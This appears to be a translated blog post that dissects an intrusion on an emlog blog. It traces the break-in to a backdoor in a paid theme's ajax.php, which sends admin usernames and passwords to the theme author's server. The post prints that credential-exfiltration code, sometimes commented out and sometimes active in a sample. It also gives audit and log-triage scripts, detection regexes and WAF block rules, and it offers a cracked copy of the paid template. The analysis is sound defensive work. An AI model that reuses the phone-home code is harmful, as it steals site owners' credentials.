Posted by barello at 2020-03-31
Preface:

Anyone who roams the jianghu gets cut sooner or later. Your little brother here got his blog hacked on the 21st. I never thought it would be my turn, and now it's a sorry sight (sad face).

Getting cut isn't the scary part; what's scary is that the blade hit my iron plate and threw sparks. As the saying goes, know yourself and know your enemy and you win every battle: you have to understand how the other side took your site. If you don't analyze the cause, the next time you get hit you'll still be the little brother.

So next we'll walk through a simple analysis of the whole intrusion.

0x01 Basic information about the blog

My blog runs on CentOS 6 with the emlog CMS and the paid template (theme) [Fly]. To be honest, the template is pretty good. When I first installed it I scanned it with D-Shield for backdoors; apart from several encrypted PHP files in the results, nothing looked wrong, so I didn't think much of it. Unexpectedly, those encrypted files are exactly what led to the intrusion.

The intrusion happened on August 21. After logging in to the server I found that the files had been deleted and index.php had been tampered with; its modification time was 18:04:15 on August 21, 2018. The defacement page looked like this:

Wait a minute. Isn't that the after-sales QQ group I use? Was it the template's author who hit my site? Of course it could also be some other hacker deliberately shifting the blame onto the author, so let's analyze the logs first.

0x02 Intrusion process analysis

First, my blog uses the Pagoda (BT) control panel, but port 888 is whitelisted so that only the jump host's IP can reach it, and the SSH port is whitelisted the same way. FTP is not open, MySQL is not exposed externally, and Yunsuo (cloud lock) serves as the WAF.

Step one: log in to the cloud lock and look for suspicious log entries around the 20th. Connect through the jump host, open xxxx.cc:888 to log in to the cloud lock console, then open the [Security] menu and click the web log path.

Then download the logs covering the 19th through the 22nd.

My blog gets almost no traffic, so the log file is small and opens fine in Notepad++. Since the modification time of the defaced page seen above falls at about 18:04 on August 21, 2018, jump straight to that part of the log.

Search for the keyword [.php] in Notepad++

Then go to the entries after 18:00.

Suspected intruder IP: 222.240.56.48. A lookup places it in Changsha, Hunan.

Now let's look file by file at how he launched the attack.

0x03 Make more backups to reduce losses

He had deleted almost all of the files on the blog; only the post image folders were left. Fortunately I had hooked the site up to Alibaba Cloud OSS, which automatically backs up the whole site every 3 days.

I have to praise Alibaba Cloud OSS here. If you only use archive storage it is very cheap: you don't pay to download the backup files, you just buy storage space.

Log in to the Alibaba Cloud console and open OSS.

Under file management you can see that the backups from before the 19th are all over 30 MB, while the ones after the 22nd are only a little over 10 MB.

So we download the backup from the 19th to restore the blog. Click the file from the 19th, choose to restore (unfreeze) it, and it will be thawed in about two minutes.

Then you'll see the download address. Download it, upload it to the blog server, and unzip it.

----Tips----

Take the site offline before restoring. First whitelist ports 80 and 443 so that only your own IP can access them; that way you don't get hit again before you have found the problem.

0x04 The official backdoor is the most lethal

The first file he visited was /include/lib/checkcode.php. Visiting it locally shows that it is the captcha (verification code) file.

The second was /content/templates/Fly/inc/ajax.php?a=ajax. Visiting it directly returns: {"code": "208"}

If the administrator is currently logged in to the blog, it instead returns the account, password and other data.

So the problem must be in ajax.php. Open it up: impressive, it's encrypted. Many thanks for the help decrypting this file.

Search for ajax in the decrypted file and you find the spot where the account password is printed out.

The log also contains /content/templates/Fly/inc/ajax.php?a=login

Search for login in the decrypted ajax.php and look at this: the official backdoor is terrifying. With my comments it is clear what it does.

When an administrator logs in through the template's ajax.php?a=login and the site URL does not match the licensed URL stored inside the template, it sends the site URL, the admin account and the password to the author's address: https://api.pjax.cn/i.php?data=

Attached code (the two phone-home lines are the ones I commented out with #; comments in English are mine):

```php
if ($_GET['a'] == 'login') {
    $username = isset($_POST['user']) ? addslashes(trim($_POST['user'])) : '';
    $password = isset($_POST['pw']) ? addslashes(trim($_POST['pw'])) : '';
    $ispersis = isset($_POST['ispersis']) ? intval($_POST['ispersis']) : false;
    $img_code = Option::get('login_code') == 'y' && isset($_POST['imgcode']) ? addslashes(trim(strtoupper($_POST['imgcode']))) : '';
    $errorCode = LoginAuth::checkUser($username, $password, $img_code);
    if ($errorCode === true) {
        LoginAuth::setAuthCookie($username, $ispersis);
        $userinfo = LoginAuth::getUserDataByLogin($username);
        $json = array('code' => '200', 'data' => $userinfo);
        // The "font" file is not a font: it holds the base64-encoded URL the
        // template was licensed for. Decode it and compare with this site's URL.
        $tempath = @file_get_contents(EMLOG_ROOT . '/content/templates/FLY/fonts/FontAwesome.woff');
        $tempath = base64_decode($tempath);
        if ($tempath != BLOG_URL && $userinfo['role'] == 'admin') {
            // Phone-home to the author. The query string reads:
            // "pirated site:<BLOG_URL>|pirated admin account:<user>|pirated admin password:<pw>|leak source:<licensed URL>"
            #$url = 'https://api.pjax.cn/i.php?data=' . urlencode('盗版地址:' . BLOG_URL . '|盗版管理员账号:' . $username . '|盗版管理员密码:' . $password . '|泄露源:' . $tempath);
            #$data = @file_get_contents($url);
        }
    } else {
        if ($errorCode == '-3') {
            $json = array('code' => '201', 'info' => '验证码输入有误'); // captcha incorrect
        } else {
            if ($errorCode == '-1') {
                $json = array('code' => '202', 'info' => '账号或密码错误'); // wrong account or password
            } else {
                if ($errorCode == '-2') {
                    $json = array('code' => '203', 'info' => '账号或密码错误'); // wrong account or password
                }
            }
        }
    }
    echo json_encode($json);
}
```
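The handler above shows two things worth checking in any downloaded theme: a "font" file that is really a base64 license blob, and a login path that reads credentials into a string and makes an outbound request. The script below is an added example of mine, not the Fly template's or emlog's code. It checks whether font files actually start with a font magic, decodes the license URL when they do not, and greps theme PHP for outbound calls, hard-coded URLs, base64_decode and credentials concatenated into strings. The sample theme is constructed for the example: the PHP is a cut-down copy of the handler with the two phone-home lines as shipped (before they were commented out), and the licensed URL https://example.com and the blog URL https://blog.example.org are placeholders.

```python
"""Audit a theme for a license blob hidden in a "font" and a phone-home login.
Added example; not the Fly template's or emlog's own code."""
import base64
import binascii
import re

# Patterns worth flagging in theme PHP. Constructed for this example.
SUSPICIOUS = {
    # outbound request whose target is a literal URL or a variable
    "outbound_call": re.compile(
        r"\b(file_get_contents|curl_init|fsockopen|fopen)\s*\(\s*(['\"]https?://|\$\w+)", re.I),
    # hard-coded remote endpoint
    "url_literal": re.compile(r"['\"]https?://[^'\"]+['\"]"),
    # something decoded from data read off disk (the license stash)
    "base64_decode": re.compile(r"\bbase64_decode\s*\("),
    # a password variable concatenated into a string
    "credential_in_string": re.compile(r"\$(password|pw|passwd)\b.*\.\s*['\"]", re.I),
}


def is_real_font(data: bytes) -> bool:
    """True if the bytes start with a WOFF/WOFF2/TrueType/OpenType magic."""
    return data[:4] in (b"wOFF", b"wOF2", b"\x00\x01\x00\x00", b"OTTO", b"true")


def decode_license_url(data: bytes):
    """Return the URL hidden in a fake font file, or None if it is not one."""
    try:
        text = base64.b64decode(data.strip(), validate=True).decode("ascii")
    except (binascii.Error, ValueError):  # UnicodeDecodeError is a ValueError
        return None
    return text if text.isprintable() and re.match(r"https?://", text) else None


def find_suspicious(php_source: str):
    """Return (tag, line_no, line) for every line matching a pattern. Commented
    lines are reported too: a leading '#' can be removed again in one edit."""
    hits = []
    for no, line in enumerate(php_source.splitlines(), 1):
        for tag, pat in SUSPICIOUS.items():
            if pat.search(line):
                hits.append((tag, no, line.strip()))
    return hits


def audit_theme(files: dict, blog_url: str):
    """files maps relative path -> bytes. Returns human-readable findings."""
    findings = []
    for path, data in files.items():
        low = path.lower()
        if low.endswith((".woff", ".woff2", ".ttf", ".otf")) and not is_real_font(data):
            url = decode_license_url(data)
            if url:
                note = "" if url == blog_url else f" (does not match {blog_url})"
                findings.append(f"{path}: not a font, holds licensed URL {url}{note}")
            else:
                findings.append(f"{path}: not a font (unknown contents)")
        elif low.endswith(".php"):
            for tag, no, line in find_suspicious(data.decode("utf-8", "replace")):
                findings.append(f"{path}:{no}: {tag}: {line}")
    return findings


# Constructed sample theme: a cut-down copy of the login handler with the
# phone-home lines active, a fake font holding the placeholder licensed URL,
# and a file with a genuine WOFF header.
SAMPLE_AJAX_PHP = """<?php
if ($_GET['a'] == 'login') {
    $errorCode = LoginAuth::checkUser($username, $password, $img_code);
    if ($errorCode === true) {
        $userinfo = LoginAuth::getUserDataByLogin($username);
        $tempath = @file_get_contents(EMLOG_ROOT . '/content/templates/FLY/fonts/FontAwesome.woff');
        $tempath = base64_decode($tempath);
        if ($tempath != BLOG_URL && $userinfo['role'] == 'admin') {
            $url = 'https://api.pjax.cn/i.php?data=' . urlencode('|' . $username . '|' . $password . '|' . $tempath);
            $data = @file_get_contents($url);
        }
    }
}
"""
SAMPLE_THEME = {
    "content/templates/Fly/inc/ajax.php": SAMPLE_AJAX_PHP.encode(),
    "content/templates/Fly/fonts/FontAwesome.woff": base64.b64encode(b"https://example.com"),
    "content/templates/Fly/fonts/real.woff": b"wOFF\x00\x01\x00\x00" + bytes(36),
}

if __name__ == "__main__":
    for finding in audit_theme(SAMPLE_THEME, "https://blog.example.org"):
        print(finding)
```

Run it against an unpacked theme by building the dict from the files on disk; a font whose magic check fails is the strongest single signal here, because a real font never base64-decodes to a URL.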

Let's keep looking down.

Here he uploads a template file and installs it.

Since the log shows no other PHP files being accessed, there is only one way my homepage index.php could have been modified: the defacement page was written into the template he uploaded, and installing that template overwrote the homepage file on my site.

He then deleted my template, which also explains why only the template was deleted while the post image folders were still there.
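The manual Notepad++ search above comes down to one pattern: a client that is not one of your own IPs successfully calls the template's ajax.php?a=login and then, within a few minutes, POSTs to the backend. The script below is an added example of mine, not the post's code and not a Yunsuo (cloud lock) feature: it parses web log lines in the common nginx/Apache "combined" format, groups them by client IP and reports that sequence. The log lines are constructed for the example; only the attacker IP, the date and the two template URLs come from the post, while the /admin upload path, the jump-host IP 198.51.100.7 and the browsing IP 203.0.113.10 are placeholders.

```python
"""Triage a web access log for the intrusion sequence described above.
Added example; not the post's own code and not a cloud lock feature."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# nginx/Apache "combined" line: ip ident user [time] "METHOD url proto" status ...
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<url>\S+)[^"]*" (?P<status>\d{3})'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# The template's front-end login endpoint (seen in the post's log) and the
# backend, where the template upload happened.
THEME_LOGIN = re.compile(r"/content/templates/fly/inc/ajax\.php\?.*\ba=login\b", re.I)
BACKEND = re.compile(r"^/admin/", re.I)


def parse_log(text):
    """Return dicts for lines that match the format; skip anything else."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        e = m.groupdict()
        e["ts"] = datetime.strptime(e["ts"], TS_FMT)
        events.append(e)
    return events


def triage(text, whitelist, window=timedelta(minutes=10)):
    """One finding per theme login from a non-whitelisted IP that is followed
    by a POST to the backend within `window`."""
    by_ip = defaultdict(list)
    for e in parse_log(text):
        by_ip[e["ip"]].append(e)
    findings = []
    for ip, evs in by_ip.items():
        if ip in whitelist:
            continue
        evs.sort(key=lambda e: e["ts"])
        for login in evs:
            if not (THEME_LOGIN.search(login["url"]) and login["status"] == "200"):
                continue
            writes = [e["url"] for e in evs
                      if e["method"] == "POST" and BACKEND.search(e["url"])
                      and login["ts"] < e["ts"] <= login["ts"] + window]
            if writes:
                findings.append({"ip": ip, "login_at": login["ts"].isoformat(), "writes": writes})
    return findings


# Constructed sample log. The jump host (198.51.100.7) performs the same
# sequence later and must not be reported; 203.0.113.10 only browses.
SAMPLE_LOG = """\
203.0.113.10 - - [21/Aug/2018:17:55:02 +0800] "GET /index.php HTTP/1.1" 200 9123 "-" "Mozilla/5.0"
222.240.56.48 - - [21/Aug/2018:18:03:41 +0800] "GET /include/lib/checkcode.php HTTP/1.1" 200 1650 "-" "Mozilla/5.0"
222.240.56.48 - - [21/Aug/2018:18:03:52 +0800] "GET /content/templates/Fly/inc/ajax.php?a=ajax HTTP/1.1" 200 14 "-" "Mozilla/5.0"
222.240.56.48 - - [21/Aug/2018:18:04:01 +0800] "POST /content/templates/Fly/inc/ajax.php?a=login HTTP/1.1" 200 412 "-" "Mozilla/5.0"
222.240.56.48 - - [21/Aug/2018:18:04:15 +0800] "POST /admin/template.php?action=upload HTTP/1.1" 200 88 "-" "Mozilla/5.0"
198.51.100.7 - - [21/Aug/2018:18:30:00 +0800] "POST /content/templates/Fly/inc/ajax.php?a=login HTTP/1.1" 200 412 "-" "Mozilla/5.0"
198.51.100.7 - - [21/Aug/2018:18:31:00 +0800] "POST /admin/template.php?action=upload HTTP/1.1" 200 88 "-" "Mozilla/5.0"
"""
WHITELIST = {"198.51.100.7"}  # placeholder jump-host IP

if __name__ == "__main__":
    for f in triage(SAMPLE_LOG, WHITELIST):
        print(f"{f['ip']} logged in via the template at {f['login_at']}, then wrote: {f['writes']}")
```

Feed it `open("access.log").read()` and your real jump-host IP; the cloud lock export will need its own LINE_RE if its format differs from the combined format assumed here.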

Time to find the attacker

First, confirm that it was the author. I already have the IP from the log: 222.240.56.48, which resolves to Changsha, Hunan.

Yes, it's you. Let's just ask the author what he meant.

It's clear enough: I changed my domain name after buying the template. The author saw my new domain and assumed I had pirated his template, so I took a stray bullet. A friendly-fire wound, but it is still true that the template has a backdoor.

Summary of the process

1. The author wrote a backdoor into /content/templates/Fly/inc/ajax.php.
2. After you log in to the backend normally, it automatically sends your backend address, account and password to the author.
3. The author then compares them against an authorization list; anything not on the list is flagged.
4. Then one day the author deletes your site and puts up a defacement page.

Avoid getting hit

Taking the protection software [cloud lock] as an example: open cloud lock and go to detailed settings

Enter vulnerability protection settings

Add a protection rule

Block access to files under the /admin backend with a regular expression: /admin([\s\S]*?) Note: after adding this rule you won't be able to reach the backend yourself either, so add your own IP or the jump host to the whitelist; afterwards only the jump host and your IP can access files under /admin. (The trailing ([\s\S]*?) group is redundant; the rule matches any URL containing /admin just as well without it.)

Next, block the template's ajax.php?a=login endpoint with the regex: a=login([\s\S]*?) Note that this matches any URL containing a=login, so whitelist your own IP here too if the template's front-end login is the one you use.

Also block access to the following files: useragent_setting.php, install.php, .lock, setting.php, functions.php

Closing words

Although this was an accident, it doesn't change the fact that I got hit, so I decided to simply crack open the template and write up how to avoid being hit. The paid template is at the end; reply to see it.

I have commented out the backdoor in the ajax file, so friends can use it with peace of mind. In addition, I don't know what some of the other encrypted files do; if you are interested, decrypt them yourself.